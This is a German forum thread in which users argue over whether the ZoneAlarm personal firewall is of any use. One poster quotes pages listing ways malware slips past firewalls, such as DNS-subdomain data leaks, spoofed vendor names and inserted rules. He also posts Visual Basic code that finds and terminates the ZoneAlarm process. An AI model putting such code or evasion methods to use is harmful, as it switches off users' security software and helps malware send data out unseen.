Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge

zonealarm... schon wieder.

GarfTermy / 14 Antworten / Baumansicht Nickles

Grundgedanken gegen zonealarm... (und einige andere dtfw´s)


ich zitiere mal einige texte zum thema:


http://www.team-cauchy.de/personal/


Schutz vor Spyware und Hintertüren


Viele Personal Firewalls blockieren ausgehende Verbindungen von Programmen bzw. lassen den Nutzer eine Liste mit Programmen erstellen, die über das Netzwerk kommunizieren dürfen. Man verspricht sich davon, bösartige Programme die ungewünscht Daten via Netzwerk übertragen wollen zu erkennen und am Versenden zu hindern.
Dies ist sicherlich wünschenswert und sinnvoll, jedoch auf M$ Windows-Systemen nicht eindeutig zu erreichen:


Angriffe auf die Personal Firewall selbst
Durch Angriffe auf die Personal Firewall (die unter M$ Windows mit den gleichen Rechten wie ein bösartiges Programm läuft) kann die Personal Firewall ausgeschaltet oder deinstalliert werden. Den Quelltext eines Visual Basic-Programms, das diese Verfahrensweise mit dem Produkt Zonealarm demonstriert findet sich in der F.A.Q. der Newsgruppe de.comp.security.misc von Urs Tränkner.



Umgehen der Personal Firewall
Einige Viren und andere Programme bringen einfach ihre eigenen Netzwerkschnittstellen mit und verwenden nicht die von M$-Windows zu Verfügung gestelle Implementierung. Durch diese Vorgehensweise wird die Personal Firewall komplett umgangen, sie bietet also keinen Schutz.
Fazit: Vor bösartige Programmen bieten Personal Firewalls keinen zuverlässigen Schutz.


(ende) (...es ist eben DOCH möglich!)


besonders gefährlich ist genau der punkt, das diverse schadsoftware und programme "ihre eigenen Netzwerkschnittstellen" mitbringen, davon bekommt za NICHTS mit. andere dtfw haben ähnliche probleme.


abhilfe kann hier nur eine application protection schaffen, die aber auch nicht als allheilmittel dienen kann.


nächster punkt:


http://home.arcor.de/nhb/pf-austricksen.html


Datentransfer von innen nach außen
Einige Beispiele aus dem realen Leben:


1) "Gibt es hier irgendwo hohle Pferde?"
Das Werbebanner-Einblendungsprogramm der Firma Aureate wird vom Setup-Programm der Wirtsanwendung kurzerhand als Netscape Navigator bzw. Internet Explorer Plugin installiert. Als Plugin kommuniziert es nicht direkt mit dem Internet, sondern nutzt die Plugin-Schnittstelle des Browser dafür.


(kommentar: damit ist streng betrachtet das system bereits kompromittiert.)


Dadurch umgeht es auf einfache Weise die Probleme, die sonst bei einem Internetzugang über ein Netzwerk auftreten würden. Aureate ist nicht nur um einiges älter als ZoneAlarm, sondern wird von sehr vielen Freeware/Shareware-Programmen wie zum Beispiel von GoZilla und WebCopier verwendet.


Anscheinend greifen neuere Versionen des Werbeflächen-Tools über die Wirtsanwendung auf das Internet zu, sofern es sich bei diesen Programmen um "Internet-Software" handelt. Suchstichwörter: advert.dll, Radiate


2) Ohne viel Aufwand
Ich habe bei einem Bekannten vor einiger Zeit im Temp-Verzeichnis eine HTML-Datei gefunden, die ein paar Bilder aus dem Internet lädt. Die Bild-URLs waren dabei ganz besonders aufgebaut: Einige bestanden unter anderem aus den Dateinamen, die man unter {Start | Dokumente} findet.


Der Realplayer kommuniziert übrigens auf diese Weise unter Umgehung der Firewall mit dem Internet:


C:\WINDOWS\TEMP\RN7080.htm


<HEAD>
  <META HTTP-EQUIV="refresh";
    CONTENT="0;URL=http://presets6.real.com/sitesmenu/rphurl.html?
      xx00xx00x0X0xxx00xXxxxx0x0xxxxxxxXxxxxxxxxx0xxxxxx0xx0xxxx
      xxXxxxx0x00xx0x0xx00xxx0xxxxx0X0X0x0X0xxx0X0xxx0X0000xx0xx
      x0X0xxx0X0xxx0X0X0x0X0Xxx00xxxxxXxxx0xx0x0xxx0xx0x00xxxxX0
      0xxXx0xXxxxx0xxXx0X0X0x0x00x00x0Xxxx">
</HEAD>


0, X, x repräsentieren Zahlen, Großbuchstaben und Kleinbuchstaben


Besonders heimtückisch ist hierbei, dass ZA vorher die "normale" Kommunikation (Update-Suche?) erkannt und unterbunden hat.


3) Namen sind Schall und Rauch
... und dann fragte die Firewall:


Do you want Microsoft Internet Explorer to access the internet?
Do you want Netscape Navigator to access the internet?
Do you want Microsoft Windows 95 to access the internet?
Do you want DFÜ-Netzwerk to access the internet?
Do you want Zone Alarm to access the internet?
Vernünftig programmierte Spyware wird sich selbst ja kaum als "The ultimative hacking tool" in Windows anmelden.


(kommentar: lol)


Wenn man bei der Erzeugung einer .exe-Datei in die Versions-Informationen als Company "Microsoft Corporation" schreibt, stuft die Norton Personal Firewall alle Verbindungsversuche dieses Programms als "Low Risk" ein ("Trusted Company").


4) Domainnamen mit privaten Informationen
Einige Personal Firewalls wie zum Beispiel NPF lassen DNS-Anfragen zur Namensauflösung in IP-Adressen ohne Rückfrage zu. Eine DNS- Anfrage läuft technisch idR. so ab, dass der gesamte Domain-Name zum Beispiel http://www.arcor.de an den DNS-Server des Zugangsproviders übermittelt wird. Dieser zerlegt den Namen von hinten nach vorne in seine Bestandteile und fragt sich ausgehend von den Root-Servern solange durch, bis er den zuständigen Server gefunden hat.


Wenn man selbst einen DNS-Server für eine Sub-Domain betreibt, bekommt man also alle Anfragen, die auf dieser Subdomain enden: kuendigung-maier.doc.recent-documents.customer-102321.example.com


5) Ab durch die Mitte
Protokoll-Tunnel (Verallgemeinerung von 1.): zum Beispiel IP over E-Mail oder http. Für einen http-Proxy [1] sieht das wie eine ganz normale Web-Seiten-Anforderung aus. Theoretisch kann man jedes Protokoll über jedes andere tunneln, solange man Einfluss auf eine entsprechende Gegenstelle hat. Bei DNS-Abfragen zum Beispiel geht das auch über "viele Ecken".


[1] Proxys verstehen im Gegensatz zu Packetfiltern das jeweilige Protokoll und sind trotzdem gegen Tunnel (fast) machtlos, da sich diese auf Protokollebene korrekt verhalten und lediglich unerwünschte Inhalte transportieren.


6) Manipulation von Webinhalten
Wenn von der Manipulation von Webseiten die Rede ist, bezieht sich das häufig auf Namesverwechselungen, gekaperte Webserver, falsche DNS-Einträge und evtl. übernommene Router. Es gibt aber noch einen ganz anderen Ort, an dem die Webseiten manipuliert werden können: Der lokale Client. Eines dieser Programme ist Gator. Es analysiert die Surf-Gewohnheiten des Users und erzeugt entsprechende Werbeeinblendungen auf fremden Webseiten. Außerdem wertet es die Eingaben in Suchmaschinen aus und platziert auf den Ergebnisseiten zusätzliche Werbelinks.


Wenn man einen Schritt weiter denkt, landet man bei der lokalen Manipulation von Online-Banking-Sessions trotzt verschlüsselter Kommunikation über das Netz. Die PF sieht dabei nur den Browser, der mit einem Webserver regelkonform kommuniziert.


7) An der PF vorbei
Jedes Programm hat unter Windows 9x die Zugriffsrechte auf der selben Ebene wie die PF mit dem Netzwerk zu kommunizieren (also nebenher). Unter Windows NT (2000, XP) gilt das Gleiche, wenn man sich als "Administrator" angemeldet hat; z.B. um Software im guten Glauben zu installieren.


Die Würmer Happy99 und Hybris kommen dem recht nah, in dem sie die WSock32.dll ersetzen. Mittlerweile gibt es auch einen Proof-Of-Concept: http://www.securityfocus.com/archive/1/244026 (Englisch)


8) Angriffe auf die PF selbst
Seit einiger Zeit gibt es die ersten bösen Programme, die Desktop-Firewalls einfach beenden:
http://www.rz.tu-ilmenau.de/~traenk/zaweg.htm
http://de.geocities.com/pseueq/y3k.htm


Außerdem kann man viele Desktop-Firewalls durch ähnlich aussehende Programme ersetzen, indem man im simpelsten Fall den Treiber-Aufruf in der Registry löscht und den Aufruf des User-Frontends mit dem Dateinamen eines entsprechend präparierten Programmes überschreibt.


Fast schon ein alter Hut ist dagegen das automatische Einfügen von neuen Regeln, da bei den meisten PFs normale Benutzerrechte dafür völlig ausreichen:


http://www.heise.de/newsticker/data/pab-18.05.01-001
http://www.heise.de/newsticker/data/pab-01.10.02-000
http://my-forum.netfirms.com/zone/zcode.htm (bestätigt "Yes-Button")


9) Und was dann noch übrig bleibt
Und zum Schluss sind da noch die bösen Programme, die überhaupt nicht mit dem Internet kommunizieren. z.B.: Ein Trojanisches Pferd, das angeblich ein Virenscanner ist (und auch wirklich andere Viren findet) allerdings zusätzlich Zifferndreher in Excel-Tabellen verursacht. Oder das böse Programm ersetzt die Telefonnummer, die an das Modem bzw. die ISDN-Karte gesendet wird, durch eine 0190-Nummer. Und hin und wieder kommt es auch in der heutigen Zeit noch vor, dass Datentransfer auf dem klassischen Wege über Wechseldatenträger (Diskette, CDs/DVDs, USB-Sticks) erfolgt.


Zugriffsmöglichkeiten von außen
Von außen gibt es grob gesagt drei Möglichkeiten, Zugriff auf dein System zu erlangen:


1) Fehlkonfigurationen
Eine Fehlkonfiguration, bei der zum Beispiel die Datei- und Druckerfreigabe nicht nur an die lokale Netzwerkkarte, sondern auch an das Internet-Interface gebunden ist. (Bei diesem Beispiel sind Personal-Firewalls recht erfolgreich). Der Aufwand einer vernünftigen Konfiguration lohnt sich trotzdem: Eine Übersicht über Konfigurationsanleitungen für die gängigen Betriebssysteme befindet sich in der dcsm-FAQ: http://www.stud.tu-ilmenau.de/~traenk/dcsm.htm#Konfiguration.


Viele Fehlkonfigurationen spielen sich auch auf Anwendungsebene ab; zum Beispiel im Browser oder Mailprogramm. Leider sind solche Geschichten (z.B. automatisches Starten von Programmen) häufig die Standard-Einstellung, die man erst mehr oder weniger mühsam ändern muss.


Hier sieht es mit dem Schutz durch PFs sehr schlecht aus, da die PF nicht mitbekommt, wenn ein Programm ungewollt Daten verändert oder löscht. Und wenn das Mailprogramm plötzlich Mails senden will, dann wird die PF es nicht davon abhalten.


2) Bugs
Die zweite große Möglichkeit besteht in der Ausnutzung von Bugs. Ein häufiges Angriffsszenario entsteht, wenn ein Programm die Länge eines Speicherbereiches beim Kopieren/Einlesen nicht prüft und über das Ende seines Puffers hinausschreibt.


Wenn in einer der dahinterliegenden Speicherzellen ein Verweis auf eine Speicheradresse mit Programmcode liegt (Rücksprungadresse bei Funktionen), dann kann diese überschrieben werden. Im simpelsten Fall steht dann dort Müll und es gibt einen "Fehler in Anwendungsprogramm". Mit etwas Mühe ist es in dieser Situation häufig möglich, in die eigenen Daten zu springen, die in Wirklichkeit Programm-Anweisungen in Maschinensprache sind.


Technische Hintergrundinformationen dazu: "Smashing The Stack For Fun And Profit" (Englisch)
oder ein deutscher Text: http://www.heise.de/ct/01/23/216/


Eine Personal Firewall könnte theoretisch solche "zu langen" Daten erkennen und abfangen. Das geht allerdings nur, wenn sie weiß, wonach sie suchen muss. Bevor die Personal Firewall-Hersteller ihre Programme angepasst haben, hat MS (bzw. die Hersteller des fehlerhaften Programms) idR. ihre Sicherheitspatches schon längst veröffentlicht.


Da solche Fehler auch immer mal wieder in Personal Firewalls gefunden werden, kann der vermeintliche Schutz das Loch auch erst aufreißen: http://cert.uni-stuttgart.de/ticker/article.php?mid=888


3) "böse Programme"
Zu guter Letzt könntest du noch eine Fernwartungssoftware oder ein anderes böses Programm gestartet haben; wahrscheinlich im Glauben ein nützliches Programm zu installieren. Allerdings machte es neben den bunten Effekten auf der Webseite (ActiveX) im Hintergrund noch andere Sachen. Oder die Mail von deinem Bekannten ist in Wirklichkeit von dem Wurm verschickt worden, den er im gleichen Irrglauben gestartet hat.


Dagegen sind PF ebenfalls machtlos: Es befindet sich in diesem Fall bereits ein Programm auf deinem Rechner, das die PF so verändern kann, dass sie Verbindungsaufbauten von außen ohne Rückfrage annehmen. Oder noch leichter: Es baut selbst eine Verbindung nach außen auf und holt sich seine Befehle ab. (Damit fällt es in den ersten Abschnitt.)


Weiterführende Informationen
http://www.linkblock.de bietet gibt eine gute Übersicht.


de.comp.security.firewall FAQ von Lutz Donnerhacke: http://www.iks-jena.de/mitarb/lutz/usenet/Firewall.html


Die "Zonealarm-FAQ" von Utz Pflock enthält einige Informationen darüber, wie man als Privatanwender einen Kompromiss zwischen Funktionalität und angestrebter Sicherheit erreichen kann. http://www.pflock.de/computer/za_faq.htm


Situationen, die einige PFs als "Angriff" fehlinterpretieren (engl.): http://www.dslreports.com/forum/remark,2169468~root=security,1~mode=flat


http://www.rz.tu-ilmenau.de/~traenk/dcsm.htm
http://www.team-cauchy.de/personal/
http://www.bauercomputer.de/Technik/spyware.htm
http://www.fefe.de/pffaq/halbesicherheit.txt
http://www.samspade.org/d/persfire.html (Englisch)


Schlussüberlegung
Desktop-Firewalls können für den Fall als Sicherheitsnetz dienen, dass man die "Datei- und Druckerfreigabe" falsch konfiguriert hat oder sich in der Vertrauens-Einschätzung eines sehr schlampig programmierten bösen Programmes vertan hat.


Dieses Netz ist allerdings sehr weitmaschig, so dass man sich darauf nicht verlassen kann. Daraus ergibt sich eine nicht zu unterschätzende neue Gefahr: Viele Leute werden mit dem Wissen, eine PF und einen Virenscanner zu haben, ausnahmsweise ein einziges Mal ein nicht vertrauenswürdiges Programm starten, ...


Zu guter Letzt handelt es sich bei Personal-Firewalls (von ipchains/iptables mal abgesehen) meist um closed-source Produkte, bei denen sich wieder die Vertrauensfrage stellt. Die einer PF zur Verfügung stehenden Daten sind marketingtechnisch sicherlich nicht uninteressant.


Dank an die alte Newsgruppe de.comp.security und ihre Nachfolgerin news:de.comp.security.firewall
Ergänzungen, Kritik, Flames, Rächtschreibveler bitte an Hendrik Brummermann <nhb_web@nexgo.de>
 HTML 4.01, CSS1 validated


(ende)


fazit bis hier? dtfw -und za im speziellen- nicht sonderlich schwer zu umgehen. es gibt sicher bessere und schlechtere. za ist hier aber die schlechtere.



und @ide atapi


"...Umgehen der Personal Firewall
Einige Viren und andere Programme bringen einfach ihre eigenen Netzwerkschnittstellen mit und verwenden nicht die von M$-Windows zu Verfügung gestelle Implementierung. Durch diese Vorgehensweise wird die Personal Firewall komplett umgangen, sie bietet also keinen Schutz.
Fazit: Vor bösartige Programmen bieten Personal Firewalls keinen zuverlässigen Schutz...."


ich hoffe, das nach dem lesen offene fragen beantwortet sind.


;-)


 


 

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „zonealarm... schon wieder.“
Optionen

Also gut, zu Allererst:

"...Umgehen der Personal Firewall
Einige Viren und andere Programme bringen einfach ihre eigenen Netzwerkschnittstellen mit und verwenden nicht die von M$-Windows zu Verfügung gestelle Implementierung. Durch diese Vorgehensweise wird die Personal Firewall komplett umgangen, sie bietet also keinen Schutz.
Fazit: Vor bösartige Programmen bieten Personal Firewalls keinen zuverlässigen Schutz...."


Meine Rede: Sie umgehen die Abfrage der DTFW. Einen eigenen Stack bringen sie aber nicht mit. Ein Stack ist keine Netzwerkschnittstelle.


Alle von dir genannten Szenarien, Sicherheitslücken und Argumente treffen
auch bei einem System mit einer HWFW oder einer anderen DTFW auf.

Für unsichere Browser und fatales Surfverhalten kann keine DTFW und keine HWFW Firewall
sorgen. Kein ZA, keine Routerfirewall und auch kein Packetfilter.

Die Aktualität der Websites hinkt hinterher. Viele unter "Bugs" aufgelisteten Themen
sind nicht mehr aktuell, da beseitigt.
Wenn du programmieren könntest, würdest du solch ein Argument nicht bringen, denn:
Keine Software ist fehlerfrei. (Erinnerst du dich an die Bugs in Cisco Firewalls?).
Hättest du gesagt ZA ist aufgrund der starken Verbreitung mehr gefährdet,
so hätte ich dir zustimmen können. Mit einem bloßen "Ihhh...das Ding hat Fehler" disqualifizierst du dich selbst.


Also: KEINE Firewall, sei es Hardware-FW oder Software-FW kann das System schützen
wenn der User nicht sein eigenes Surf und Verhaltenskonzept entwickelt.

Eine DTFW, im speziellen Falle auch ZA, kann in Verbindung mit einem vernünftigem User
Sicherheit bringen.
Nicht mehr Sicherheit oder weniger Sicherheit als mit einer HWFW.
Oder mit anderen Worten:

Ein bereits infiziertes System kann mit keiner FW mehr geschützt werden
Fast alle auf den Webseiten genannten Fälle beschreiben diesen Fall.


Und zum Schluss: Nicht alle Quellen sind geeignet sie ohne Nachzudenken zu adaptieren. (Schon gar nicht Seiten die Microsoft mit "$" schreiben).


Hier wird auf ZA eingedroschen und wenn man nach dem Warum fragt kommen immer wieder die gleichen Sprüche. Alles Fälle die auf andere Soft- und Hardwarelösungen auch zutreffen.
Nachgeplappert von irgendwelchen Websites.

Das richtige Argument gegen ZA habe ich hier bisher noch nicht gehört.

Gruß
IDE-ATAPI

bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „Also gut, zu Allererst: ...Umgehen der Personal Firewall Einige Viren und andere...“
Optionen

"...Für unsichere Browser und fatales Surfverhalten kann keine DTFW und keine HWFW Firewall
sorgen. Kein ZA, keine Routerfirewall und auch kein Packetfilter. ..."

eher richtig konfigurierte hfw, ...sonst - ja.

"...Keine Software ist fehlerfrei. (Erinnerst du dich an die Bugs in Cisco Firewalls?). ..."

ich habe nicht behauptet, das eine software fehlerfrei ist.

"...Hättest du gesagt ZA ist aufgrund der starken Verbreitung mehr gefährdet,
so hätte ich dir zustimmen können. ..."

das ist nur einer der punkte gegen za.

"...Ein bereits infiziertes System kann mit keiner FW mehr geschützt werden ..."

mit einer dtfw - nein. mit einer hfw - wenn auch eingeschränkt - ja.

"...Nicht alle Quellen sind geeignet sie ohne Nachzudenken zu adaptieren...."

ich will zum nachdenken anregen. da darf sich jeder seine meinung bilden.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „ ...Für unsichere Browser und fatales Surfverhalten kann keine DTFW und keine...“
Optionen
"...Für unsichere Browser und fatales Surfverhalten kann keine DTFW und keine HWFW Firewall
sorgen. Kein ZA, keine Routerfirewall und auch kein Packetfilter. ..."

eher richtig konfigurierte hfw, ...sonst - ja. "


So? Folgendes Szenario: Mein Trojaner ist auf deinem Rechner.
Ich will nach draussen. Meckert deine HWFW bei passendem Portcopy auf Port 80 ?

"ich habe nicht behauptet, das eine software fehlerfrei ist."

Entweder bist du vergesslich oder du solltest du die Dinge die du per Copy&Paste postest durchlesen und verstehen bevor du leichtsinnig auf Abschicken klickst:
"
2) Bugs
Die zweite große Möglichkeit besteht in der Ausnutzung von Bugs..."




"...Hättest du gesagt ZA ist aufgrund der starken Verbreitung mehr gefährdet,
so hätte ich dir zustimmen können. ..."

"das ist nur einer der punkte gegen za."


Das wäre ein rationaler Punkt gegen ZA. Leider kam er nicht von dir.

"...Ein bereits infiziertes System kann mit keiner FW mehr geschützt werden ..."

mit einer dtfw - nein. mit einer hfw - wenn auch eingeschränkt - ja.


s.oben. Kein Kommentar mehr. Ich habs oft genug wiederholt. Na gut,
noch einmal:

Gegen ein infiziertes System hilft KEINE Firewall. Kein ZA, keine Hardware Firewall.

"...Nicht alle Quellen sind geeignet sie ohne Nachzudenken zu adaptieren...."

ich will zum nachdenken anregen. da darf sich jeder seine meinung bilden.

Du adaptierst sie sehr wohl indem du ihren Inhalt bewertest.
fazit bis hier? dtfw -und za im speziellen- nicht...

Oder stehst du nicht dazu was auf diesen Webseiten steht?


Jetzt mal Klartext.

ich habe bisher noch keinen vernünftigen Grund von dir gehört
dass man ZA entsetzt in die Ecke pfeffern sollte, so
wie du es einem chronisch predigst.

Nenne doch mal bitte ein paar Gründe.
bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „ ...Für unsichere Browser und fatales Surfverhalten kann keine DTFW und keine...“
Optionen

contra za? ...gerne:

Code:

Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „contra za? ...gerne: Code: Option Explicit Private Declare Function CloseHandle...“
Optionen

Ok, jetzt wirds lächerlich.

1. Der Code setzt vorraus dass er bereits auf einem infizierten System
läuft. (Läuft ein schädlicher Code auf einem System hilft keine FW mehr. Weder ZA Noch HWFW. Ich wiederhole mich schon wieder :( )

2. Den Code kann man umschreiben, so dass er jeden DTFW Prozess schliesst. (Warum nur ZA?) Man kann ihn genauso umschreiben dass
HWFWs umgeht.

3. Der "Bug" ist bei ZA behoben. Funktioniert also nicht mehr.

Kleines Resumee:

Deine Definition einer sinnvollen DTFW lautet also:

vernünftig ist zb...

* ordentliche implementierung von regeln
* keine sinnfreien meldungen (ping=hacker...)


Fachlich, unter dem Sicherheitsaspekt kannst du keine konkreten
Gründe gegen ZA nennen, die nicht auch bei anderen FWs auftreten.
Trotzdem predigst du hier jedem Fragenden auf diesem Board dass
ZA "der letzte Witz", "unsicher und ungeeignet" und totaler "Müll" wäre.

Nun dem ist nichts mehr hinzuzufügen.

Hoffe den Leuten zum Nachdenken verholfen zu haben.


Gruß
IDE-ATAPI

Achja:


;)

bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „Ok, jetzt wirds lächerlich. 1. Der Code setzt vorraus dass er bereits auf einem...“
Optionen

"...1. Der Code setzt vorraus dass er bereits auf einem infizierten System ..."

kann es sein, das du ein generelles verständnisproblem hast?

das zu schützende betriebssystem ist ein sieb. ein geklebtes pflaster macht nur ein loch zu - die anderen, auch die der dtfw, sind nach wie vor vorhanden.

der code zeigt, das za immerwieder derartige löcher hat. falls dir ein beispiel nicht reicht, dann mach dir doch mal die mühe die changelogs der jeweils neuen version anzusehen.

da steht immerwieder eine lange liste von "bug fixed".

nur wer DAS NICHT LESEN kann, empfiehlt ruhigen gewissens eine bugsammlung.

"...3. Der "Bug" ist bei ZA behoben. Funktioniert also nicht mehr. ..."

was ist mit den anderen bugs? ...die dann im nächsten changelog zu sehen sein werden.

wenn du für dich za einsetzen willst, tu das. ich werde jedoch auch weiterhin von za und nis abraten.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „ ...1. Der Code setzt vorraus dass er bereits auf einem infizierten System ......“
Optionen

Alles, ABER AUCH ALLES was du erwähnst trifft auch auf andere DTFW zu.

Du rätst aber trotzdem weiterhin von ZA aufgrund diesen Tatsachen ab.

Jetzt bleibt jedem selbst die Entscheidung zu treffen wer
hier das Verständnisproblem hat.

IDE-ATAPI

bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „Alles, ABER AUCH ALLES was du erwähnst trifft auch auf andere DTFW zu. Du...“
Optionen

ok. nimm du za. ich kann und werde es auch weiterhin nicht empfehlen. gleiches trifft auf norton/symantec zu.

wenn dir buglisten nicht zu einer anderen entscheidungsfindung verhelfen, dann soll es so sein.

ich bevorzuge software, die offenbar weniger mit bugs belastet ist.

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
IDE-ATAPI GarfTermy „ok. nimm du za. ich kann und werde es auch weiterhin nicht empfehlen. gleiches...“
Optionen

Tolles Argument.
Schonmal die Changelogs von Mozilla, Opera oder gar dem IE (den du anscheinend sogar verwendest...lol) angeschaut?

Belassen wir es dabei. Da kommt nix raus ausser heisser Luft.

bei Antwort benachrichtigen
GarfTermy IDE-ATAPI „Tolles Argument. Schonmal die Changelogs von Mozilla, Opera oder gar dem IE den...“
Optionen

...wie ich schon vor wochen postete, befindest sich mein netz in der komfortablen lage hinter einer proventia m50 zu werkeln. ein ie ist da nicht höher gefährdet, als alle anderen mit dem netz kommunizierenden programme auch.

lassen wir das. du hast deine meinung, ich meine.

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
ThomasS GarfTermy „zonealarm... schon wieder.“
Optionen

Ich sehe das auch so wie IDE-ATAPI, eine PWF ist immer nur eine Komponente in einem Gesammtsicherheitskonzept, nicht mehr und auch nicht weniger. Wenn dieses Konzept in sich stimmig ist, macht sie situationsgegeben auch Sinn.

Beispiel, ich wohne in einer WG, 3 Mitbewohner, alle haben PC's und nutzen das I-Net. I-Net, DSL-Flatrate, läuft über Router, HWF ist aktiviert.
2 nutzen Win98 und scheren sich kaum um Sicherheit. Ich nutze XP Pro, bewege mich nur mit eingeschränkten Benutzerrechten und Sicherheitsstufe 1 im I-Net, also bestehen ausschliesslich im Benutzerprofil schreibrechte und es gibt keine Freigaben, weder im WAN noch im LAN.
Outpost Pro 2.5 ist die von mir im Einsatz befindliche FireWall, die restriktiv konfiguriert ist, also auch auch alle LAN-Verbindungsversuche blockt und protokolliert.

So, die Tage ist mir nach einem routinemassigem Blick in die Protokolle der PFW aufgefalle, dass von einem der Rechner im LAN ca. alle 2min Zugriffsversuche auf meinen Rechner von der PFW geblockt wurden.

Habe denjenigen darauf hingewiesen, und was stellt sich raus, der Rechner ist komprimitiert.

Frage, PFW sinnvoll oder nicht?

Darf sich jetzt jeder selbst beantworten.

Grüsse, ThomasS

bei Antwort benachrichtigen
ThomasS Nachtrag zu: „Ich sehe das auch so wie IDE-ATAPI, eine PWF ist immer nur eine Komponente in...“
Optionen
bei Antwort benachrichtigen
GarfTermy ThomasS „...natürlich kompromitiert...“
Optionen

...damit wir uns nicht falsch verstehen - ich sage immer, das eine dtfw durchaus einen platz in einem sicherheitskonzept haben kann. nur sollte es eine vernünftige sein.

vernünftig ist zb...

* ordentliche implementierung von regeln
* keine sinnfreien meldungen (ping=hacker...)

;-)

The two basic principles of Windows system administration: For minor problems, reboot For major problems, reinstall
bei Antwort benachrichtigen
ThomasS GarfTermy „...natürlich kompromitiert...“
Optionen

...that's right...
;-)

bei Antwort benachrichtigen